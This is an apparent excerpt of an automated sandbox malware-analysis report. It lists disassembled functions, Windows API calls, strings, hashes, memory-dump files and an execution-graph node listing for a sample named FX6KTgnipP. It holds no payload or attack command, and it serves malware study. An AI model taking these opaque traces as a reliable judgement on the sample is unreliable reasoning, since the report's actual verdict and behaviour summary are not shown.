                                                                                                                                                                            • Instruction Fuzzy Hash: 501108B266431577D6209F249C89FFB77ACEB8A700F000469F75DA3180C771A8A59675
                                                                                                                                                                            Function 00255109 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00255094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002550B3
                                                                                                                                                                              • Part of subcall function 00255094: GetProcAddress.KERNEL32(002951F8,CryptUnprotectMemory), ref: 002550C3
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000200,?,00255104), ref: 00255197
                                                                                                                                                                            Strings
                                                                                                                                                                            • CryptUnprotectMemory failed, xrefs: 0025518F
                                                                                                                                                                            • CryptProtectMemory failed, xrefs: 0025514E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$CurrentProcess
                                                                                                                                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                            • API String ID: 2190909847-396321323
                                                                                                                                                                            • Opcode ID: 73cdc4c2c5b6f87e92923b29d9c4438f9259aa73a7384ec0b9c84279dd316a4b
                                                                                                                                                                            • Instruction ID: 87bc3b9fe6089e689f5f836c098a0861fb4d5006f366b7e3172e9ee449492066
                                                                                                                                                                            • Opcode Fuzzy Hash: 73cdc4c2c5b6f87e92923b29d9c4438f9259aa73a7384ec0b9c84279dd316a4b
                                                                                                                                                                            • Instruction Fuzzy Hash: 32112931A21E35ABDF169F34EC15B6E3F65AF00761B10C01AFC095B281D6709D658BD8
                                                                                                                                                                            Function 0025FEA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00020008,?), ref: 0025FEB6
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0025FEE1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentErrorLastProcess
                                                                                                                                                                            • String ID: $L&
                                                                                                                                                                            • API String ID: 335030130-1321513690
                                                                                                                                                                            • Opcode ID: 25b955560bbe25a4ace3e734ab13c232bb7d8d4a823f5f887f704f2e9e93703e
                                                                                                                                                                            • Instruction ID: 48c436af7e347c4244c10ce560a0963b4801f82b0fe56b2c4155a50b7d3e23e6
                                                                                                                                                                            • Opcode Fuzzy Hash: 25b955560bbe25a4ace3e734ab13c232bb7d8d4a823f5f887f704f2e9e93703e
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A012D72A64209BFDF115FA0ED49EEE7B6DEB15351F100066FA01D1050D7718E949A64
                                                                                                                                                                            Function 00264264 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindowVisible.USER32(000103E6), ref: 00264291
                                                                                                                                                                            • DialogBoxParamW.USER32(GETPASSWORD1,000103E6,00260110,?), ref: 002642BA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DialogParamVisibleWindow
                                                                                                                                                                            • String ID: GETPASSWORD1
                                                                                                                                                                            • API String ID: 3157717868-3292211884
                                                                                                                                                                            • Opcode ID: 5c7ab0215ec400c140cf29caefa55b0af8c71253a2c9553299bc1a60447a3701
                                                                                                                                                                            • Instruction ID: 40218f00121ec0db0d796808c35258f2878e958510a64c81aadb9bbfcb61247d
                                                                                                                                                                            • Opcode Fuzzy Hash: 5c7ab0215ec400c140cf29caefa55b0af8c71253a2c9553299bc1a60447a3701
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F01F9303B6725BFCB167F64AC6AE6A37C8AB03310B15815AFC4993191C6B058F4CB61
                                                                                                                                                                            Function 00263C19 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(?,00000001,0025FE90,?), ref: 00263C34
                                                                                                                                                                              • Part of subcall function 00241CC4: GetDlgItem.USER32(?,?), ref: 00241CD2
                                                                                                                                                                              • Part of subcall function 00241CC4: KiUserCallbackDispatcher.NTDLL(00000000), ref: 00241CD9
                                                                                                                                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00263C6F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallbackDispatcherItemMessageSendShowUserWindow
                                                                                                                                                                            • String ID: @U=u
                                                                                                                                                                            • API String ID: 3689821562-2594219639
                                                                                                                                                                            • Opcode ID: 058415428f4fd630a91eb06ddcc27e8fbee426caae17c0f96689cf32ddc04411
                                                                                                                                                                            • Instruction ID: 7cd92bf5ee423d41cf45ab90bedda8e045871bce4f0b67bcad6c2f5636a20293
                                                                                                                                                                            • Opcode Fuzzy Hash: 058415428f4fd630a91eb06ddcc27e8fbee426caae17c0f96689cf32ddc04411
                                                                                                                                                                            • Instruction Fuzzy Hash: 1AF0A530668751BAEB228B24FC4EB957AA1B710715F14445BB245280F1C3F644E8CB06
                                                                                                                                                                            Function 0026536D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00265379
                                                                                                                                                                              • Part of subcall function 002652FB: std::exception::exception.LIBCONCRT ref: 00265308
                                                                                                                                                                              • Part of subcall function 0026734A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0026536C,?,hTl(,?), ref: 002673AA
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0026539F
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionRaise$AccessDloadHelper2@8LoadReleaseSectionWrite___delaystd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                            • String ID: @Uxu
                                                                                                                                                                            • API String ID: 1552410523-397286711
                                                                                                                                                                            • Opcode ID: ca1dc02c74295731213ab91994c73873d2628fc652a716ddeed04321d6e5b39e
                                                                                                                                                                            • Instruction ID: 8ba341640e5010692adb0cc056b3d85f3a78c5ae043e5a757f4301a484d1adc2
                                                                                                                                                                            • Opcode Fuzzy Hash: ca1dc02c74295731213ab91994c73873d2628fc652a716ddeed04321d6e5b39e
                                                                                                                                                                            • Instruction Fuzzy Hash: CBD05B6997C10CBA9704B690DC1BD7E372CD941700F204465BD40D15C5EAA095B44AA1
                                                                                                                                                                            Function 002575ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,0025770A,?,?,0025777F,?,?,?,?,?,00257769), ref: 002575F3
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0025777F,?,?,?,?,?,00257769), ref: 002575FF
                                                                                                                                                                              • Part of subcall function 002492EB: __EH_prolog3_GS.LIBCMT ref: 002492F2
                                                                                                                                                                            Strings
                                                                                                                                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00257608
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorH_prolog3_LastObjectSingleWait
                                                                                                                                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                            • API String ID: 2419225763-2248577382
                                                                                                                                                                            • Opcode ID: 0f03dc1cd2fdb58c629b0df650595922c5ff9167eb70a95772d20d096f463141
                                                                                                                                                                            • Instruction ID: c1aefa0646ea9a6328b590acc4c85aac94ea8826a66a203b7b321e6e78b17a40
                                                                                                                                                                            • Opcode Fuzzy Hash: 0f03dc1cd2fdb58c629b0df650595922c5ff9167eb70a95772d20d096f463141
                                                                                                                                                                            • Instruction Fuzzy Hash: D5D05E31559421BBD91437797C0ECAF391D9F22731F610718FA3C652E5DA6009E146ED
                                                                                                                                                                            Function 00253E60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,6294DA82), ref: 00253E65
                                                                                                                                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00253E73
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FindHandleModuleResource
                                                                                                                                                                            • String ID: RTL
                                                                                                                                                                            • API String ID: 3537982541-834975271
                                                                                                                                                                            • Opcode ID: 5799fed4282f02a17e1f14625806290e55ff1668cc0326daa83cdcbf6932f60d
                                                                                                                                                                            • Instruction ID: f42ab5666c173c07daf17fde3887d4d8207248a2384136778b8e84d995b32fba
                                                                                                                                                                            • Opcode Fuzzy Hash: 5799fed4282f02a17e1f14625806290e55ff1668cc0326daa83cdcbf6932f60d
                                                                                                                                                                            • Instruction Fuzzy Hash: 09C0803175031096E73417717C0DB432D986F15755F15045CB90D990C0D5F5D4908BD0

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:3.7%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:1.8%
                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                            Total number of Limit Nodes:57
                                                                                                                                                                            execution_graph 98845 851044 98850 852735 98845->98850 98887 8529da 98850->98887 98854 8527ac 98897 85bf07 98854->98897 98857 85bf07 8 API calls 98858 8527c0 98857->98858 98859 85bf07 8 API calls 98858->98859 98860 8527ca 98859->98860 98861 85bf07 8 API calls 98860->98861 98862 852808 98861->98862 98863 85bf07 8 API calls 98862->98863 98864 8528d4 98863->98864 98902 852d5e 98864->98902 98868 852906 98869 85bf07 8 API calls 98868->98869 98870 852910 98869->98870 98923 8630e0 98870->98923 98872 85293b 98933 8530ed 98872->98933 98951 852a33 98887->98951 98890 852a33 8 API calls 98891 852a12 98890->98891 98892 85bf07 8 API calls 98891->98892 98893 852a1e 98892->98893 98958 8584b7 98893->98958 98895 85276b 98896 853205 6 API calls 98895->98896 98896->98854 98898 87019b 8 API calls 98897->98898 98899 85bf1c 98898->98899 98900 87016b 8 API calls 98899->98900 98901 8527b6 98900->98901 98901->98857 98903 85bf07 8 API calls 98902->98903 98904 852d6e 98903->98904 98905 85bf07 8 API calls 98904->98905 98906 852d76 98905->98906 98907 85bf07 8 API calls 98906->98907 98908 852d91 98907->98908 98909 87016b 8 API calls 98908->98909 98910 8528de 98909->98910 98911 85318c 98910->98911 98912 85319a 98911->98912 98913 85bf07 8 API calls 98912->98913 98914 8531a5 98913->98914 98915 85bf07 8 API calls 98914->98915 98916 8531b0 98915->98916 98917 85bf07 8 API calls 98916->98917 98918 8531bb 98917->98918 98919 85bf07 8 API calls 98918->98919 98920 8531c6 98919->98920 98921 87016b 8 API calls 98920->98921 98922 8531d8 RegisterWindowMessageW 98921->98922 98922->98868 98924 863121 98923->98924 98932 8630fd 98923->98932 98996 8705d2 5 API calls __Init_thread_wait 98924->98996 98925 86310e 98925->98872 98927 86312b 98927->98932 98997 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98927->98997 98929 869ec7 98929->98925 98999 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98929->98999 98932->98925 98998 8705d2 5 API calls __Init_thread_wait 98932->98998 98934 893c69 98933->98934 98935 8530fd 98933->98935 98952 85bf07 8 API calls 98951->98952 98953 852a3e 98952->98953 98954 85bf07 8 API calls 98953->98954 98955 852a46 98954->98955 98956 85bf07 8 API calls 98955->98956 98957 852a08 98956->98957 98957->98890 98959 8965bb 98958->98959 98960 8584c7 _wcslen 98958->98960 98983 8596d9 98959->98983 98963 858502 98960->98963 98964 8584dd 98960->98964 98962 8965c4 98962->98962 98965 87016b 8 API calls 98963->98965 98970 858894 98964->98970 98968 85850e 98965->98968 98967 8584e5 __fread_nolock 98967->98895 98974 87019b 98968->98974 98971 8588a6 98970->98971 98972 8588ac 98970->98972 98971->98967 98973 87019b 8 API calls 98972->98973 98973->98971 98975 87016b ___std_exception_copy 98974->98975 98976 87018a 98975->98976 98979 87018c 98975->98979 98987 87523d 7 API calls 2 library calls 98975->98987 98976->98967 98978 8709fd 98989 873634 RaiseException 98978->98989 98979->98978 98988 873634 RaiseException 98979->98988 98981 870a1a 98981->98967 98984 8596e7 98983->98984 98986 8596f0 __fread_nolock 98983->98986 98984->98986 98990 85c269 98984->98990 98986->98962 98987->98975 98988->98978 98989->98981 98991 85c27c 98990->98991 98995 85c279 __fread_nolock 98990->98995 98992 87016b 8 API calls 98991->98992 98993 85c287 98992->98993 98994 87019b 8 API calls 98993->98994 98994->98995 98995->98986 98996->98927 98997->98932 98998->98929 98999->98925 99005 8a1a68 99006 8a1a70 99005->99006 99009 85d4e5 99005->99009 99051 8b79af 8 API calls __fread_nolock 99006->99051 99008 8a1a82 99052 8b7928 8 API calls __fread_nolock 99008->99052 99012 87016b 8 API calls 99009->99012 99011 8a1aac 99053 8602f0 99011->99053 99014 85d539 99012->99014 99035 85c2cd 99014->99035 99015 8a1ad3 99016 8a1ae7 99015->99016 99076 8d60a2 53 API calls _wcslen 99015->99076 99020 87016b 8 API calls 99029 85d61e ISource 99020->99029 99021 8a1b04 99021->99009 99077 8b79af 8 API calls __fread_nolock 99021->99077 99024 85be6d 8 API calls 99024->99029 99027 85d973 99028 8a1f1c 99079 8b55d9 8 API calls ISource 99028->99079 99029->99024 99029->99028 99031 8a1f37 99029->99031 99032 85c34b 8 API calls 99029->99032 99034 85d8c1 ISource 99029->99034 99078 85b3fe 8 API calls 99029->99078 99032->99029 99033 85d95c ISource 99033->99027 99050 86e284 8 API calls ISource 99033->99050 99034->99033 99042 85c34b 99034->99042 99041 85c2dd 99035->99041 99036 85c2e5 99036->99020 99037 87016b 8 API calls 99037->99041 99038 85bf07 8 API calls 99038->99041 99040 85c2cd 8 API calls 99040->99041 99041->99036 99041->99037 99041->99038 99041->99040 99080 85be6d 99041->99080 99043 85c359 99042->99043 99049 85c381 ISource 99042->99049 99044 85c367 99043->99044 99045 85c34b 8 API calls 99043->99045 99046 85c36d 99044->99046 99047 85c34b 8 API calls 99044->99047 99045->99044 99046->99049 99084 85c780 99046->99084 99047->99046 99049->99033 99050->99033 99051->99008 99052->99011 99072 860326 ISource 99053->99072 99054 870433 29 API calls pre_c_initialization 99054->99072 99055 8a62cf 99103 8c3ef6 81 API calls __wsopen_s 99055->99103 99056 87016b 8 API calls 99056->99072 99058 861645 99062 85be6d 8 API calls 99058->99062 99070 86044d ISource 99058->99070 99060 8a5c7f 99068 85be6d 8 API calls 99060->99068 99060->99070 99061 8a61fe 99102 8c3ef6 81 API calls __wsopen_s 99061->99102 99062->99070 99065 85be6d 8 API calls 99065->99072 99066 8705d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99066->99072 99068->99070 99069 85bf07 8 API calls 99069->99072 99070->99015 99071 8a60b9 99100 8c3ef6 81 API calls __wsopen_s 99071->99100 99072->99054 99072->99055 99072->99056 99072->99058 99072->99060 99072->99061 99072->99065 99072->99066 99072->99069 99072->99070 99072->99071 99073 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 99072->99073 99075 860a5e ISource 99072->99075 99089 861e00 99072->99089 99099 861940 253 API calls 2 library calls 99072->99099 99073->99072 99101 8c3ef6 81 API calls __wsopen_s 99075->99101 99076->99021 99077->99021 99078->99029 99079->99031 99081 85be90 __fread_nolock 99080->99081 99082 85be81 99080->99082 99081->99041 99082->99081 99083 87019b 8 API calls 99082->99083 99083->99081 99086 85c78b ISource 99084->99086 99085 85c7c6 ISource 99085->99049 99086->99085 99088 86e29c 8 API calls ISource 99086->99088 99088->99085 99095 861e1d ISource 99089->99095 99090 8624c2 99096 861fa7 ISource 99090->99096 99107 86bd82 39 API calls 99090->99107 99093 8a77db 99093->99096 99106 87d2f5 39 API calls 99093->99106 99095->99090 99095->99093 99095->99096 99098 8a760f 99095->99098 99105 86e29c 8 API calls ISource 99095->99105 99096->99072 99104 87d2f5 39 API calls 99098->99104 99099->99072 99100->99075 99101->99070 99102->99070 99103->99070 99104->99098 99105->99095 99106->99096 99107->99096 99108 85f48c 99111 85ca50 99108->99111 99112 85ca6b 99111->99112 99113 8a14af 99112->99113 99114 8a1461 99112->99114 99139 85ca90 99112->99139 99156 8d61ff 253 API calls 2 library calls 99113->99156 99117 8a146b 99114->99117 99119 8a1478 99114->99119 99114->99139 99154 8d6690 253 API calls 99117->99154 99136 85cd60 99119->99136 99155 8d6b2d 253 API calls 2 library calls 99119->99155 99124 85cf30 39 API calls 99124->99139 99125 8a1742 99125->99125 99128 8a168b 99159 8d6569 81 API calls 99128->99159 99132 85cd8e 99136->99132 99160 8c3ef6 81 API calls __wsopen_s 99136->99160 99137 86e781 39 API calls 99137->99139 99138 8602f0 253 API calls 99138->99139 99139->99124 99139->99128 99139->99132 99139->99136 99139->99137 99139->99138 99140 85be6d 8 API calls 99139->99140 99142 85bdc1 99139->99142 99146 86e73b 39 API calls 99139->99146 99147 86aa19 253 API calls 99139->99147 99148 8705d2 5 API calls __Init_thread_wait 99139->99148 99149 86bbd2 8 API calls 99139->99149 99150 870433 29 API calls __onexit 99139->99150 99151 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99139->99151 99152 86f4ed 81 API calls 99139->99152 99153 86f354 253 API calls 99139->99153 99157 85b3fe 8 API calls 99139->99157 99158 8aff4f 8 API calls 99139->99158 99140->99139 99143 85bdcc 99142->99143 99144 85bdfb 99143->99144 99161 85bf39 99143->99161 99144->99139 99146->99139 99147->99139 99148->99139 99149->99139 99150->99139 99151->99139 99152->99139 99153->99139 99154->99119 99155->99136 99156->99139 99157->99139 99158->99139 99159->99136 99160->99125 99178 85cf30 99161->99178 99163 85bf49 99164 85bf57 99163->99164 99165 8a0d59 99163->99165 99167 87016b 8 API calls 99164->99167 99187 85b3fe 8 API calls 99165->99187 99169 85bf68 99167->99169 99168 8a0d64 99170 85bf07 8 API calls 99169->99170 99171 85bf72 99170->99171 99172 85bf81 99171->99172 99173 85be6d 8 API calls 99171->99173 99174 87016b 8 API calls 99172->99174 99173->99172 99175 85bf8b 99174->99175 99186 85be0f 39 API calls 99175->99186 99177 85bfaf 99177->99144 99179 85d177 99178->99179 99184 85cf43 99178->99184 99179->99163 99181 85cfed 99181->99163 99182 85bf07 8 API calls 99182->99184 99184->99181 99184->99182 99188 8705d2 5 API calls __Init_thread_wait 99184->99188 99189 870433 29 API calls __onexit 99184->99189 99190 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99184->99190 99186->99177 99187->99168 99188->99184 99189->99184 99190->99184 99191 87f08e 99192 87f09a ___DestructExceptionObject 99191->99192 99193 87f0a6 99192->99193 99194 87f0bb 99192->99194 99210 87f669 20 API calls _abort 99193->99210 99204 87951d EnterCriticalSection 99194->99204 99197 87f0ab 99211 882b7c 26 API calls ___std_exception_copy 99197->99211 99198 87f0c7 99205 87f0fb 99198->99205 99202 87f0b6 __wsopen_s 99204->99198 99213 87f126 99205->99213 99207 87f108 99208 87f0d4 99207->99208 99233 87f669 20 API calls _abort 99207->99233 99212 87f0f1 LeaveCriticalSection __fread_nolock 99208->99212 99210->99197 99211->99202 99212->99202 99214 87f134 99213->99214 99215 87f14e 99213->99215 99244 87f669 20 API calls _abort 99214->99244 99234 87dce5 99215->99234 99218 87f139 99245 882b7c 26 API calls ___std_exception_copy 99218->99245 99219 87f157 99241 889799 99219->99241 99223 87f1df 99226 87f1fc 99223->99226 99232 87f20e 99223->99232 99224 87f25b 99225 87f268 99224->99225 99224->99232 99247 87f669 20 API calls _abort 99225->99247 99246 87f43f 31 API calls 4 library calls 99226->99246 99229 87f206 99230 87f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 99229->99230 99230->99207 99232->99230 99248 87f2bb 30 API calls 2 library calls 99232->99248 99233->99208 99235 87dd06 99234->99235 99236 87dcf1 99234->99236 99235->99219 99249 87f669 20 API calls _abort 99236->99249 99238 87dcf6 99250 882b7c 26 API calls ___std_exception_copy 99238->99250 99240 87dd01 99240->99219 99251 889616 99241->99251 99243 87f173 99243->99223 99243->99224 99243->99230 99244->99218 99245->99230 99246->99229 99247->99230 99248->99230 99249->99238 99250->99240 99252 889622 ___DestructExceptionObject 99251->99252 99253 88962a 99252->99253 99254 889642 99252->99254 99286 87f656 20 API calls _abort 99253->99286 99256 8896f6 99254->99256 99260 88967a 99254->99260 99291 87f656 20 API calls _abort 99256->99291 99257 88962f 99287 87f669 20 API calls _abort 99257->99287 99276 8854d7 EnterCriticalSection 99260->99276 99261 8896fb 99292 87f669 20 API calls _abort 99261->99292 99264 889680 99266 8896b9 99264->99266 99267 8896a4 99264->99267 99265 889703 99293 882b7c 26 API calls ___std_exception_copy 99265->99293 99277 88971b 99266->99277 99288 87f669 20 API calls _abort 99267->99288 99269 889637 __wsopen_s 99269->99243 99272 8896b4 99290 8896ee LeaveCriticalSection __wsopen_s 99272->99290 99273 8896a9 99289 87f656 20 API calls _abort 99273->99289 99276->99264 99294 885754 99277->99294 99279 88972d 99280 889735 99279->99280 99281 889746 SetFilePointerEx 99279->99281 99307 87f669 20 API calls _abort 99280->99307 99283 88975e GetLastError 99281->99283 99285 88973a 99281->99285 99308 87f633 20 API calls 2 library calls 99283->99308 99285->99272 99286->99257 99287->99269 99288->99273 99289->99272 99290->99269 99291->99261 99292->99265 99293->99269 99295 885761 99294->99295 99296 885776 99294->99296 99309 87f656 20 API calls _abort 99295->99309 99302 88579b 99296->99302 99311 87f656 20 API calls _abort 99296->99311 99299 885766 99310 87f669 20 API calls _abort 99299->99310 99300 8857a6 99312 87f669 20 API calls _abort 99300->99312 99302->99279 99304 88576e 99304->99279 99305 8857ae 99313 882b7c 26 API calls ___std_exception_copy 99305->99313 99307->99285 99308->99285 99309->99299 99310->99304 99311->99300 99312->99305 99313->99304 99314 860e6f 99315 860e83 99314->99315 99321 8613d5 99314->99321 99316 860e95 99315->99316 99319 87016b 8 API calls 99315->99319 99317 8a55d0 99316->99317 99320 860eee 99316->99320 99415 85b3fe 8 API calls 99316->99415 99416 8c1a29 8 API calls 99317->99416 99319->99316 99329 86044d ISource 99320->99329 99347 862ad0 99320->99347 99321->99316 99324 85be6d 8 API calls 99321->99324 99324->99316 99325 8a62cf 99420 8c3ef6 81 API calls __wsopen_s 99325->99420 99326 87016b 8 API calls 99331 860326 ISource 99326->99331 99327 861e00 40 API calls 99327->99331 99328 861645 99328->99329 99335 85be6d 8 API calls 99328->99335 99331->99325 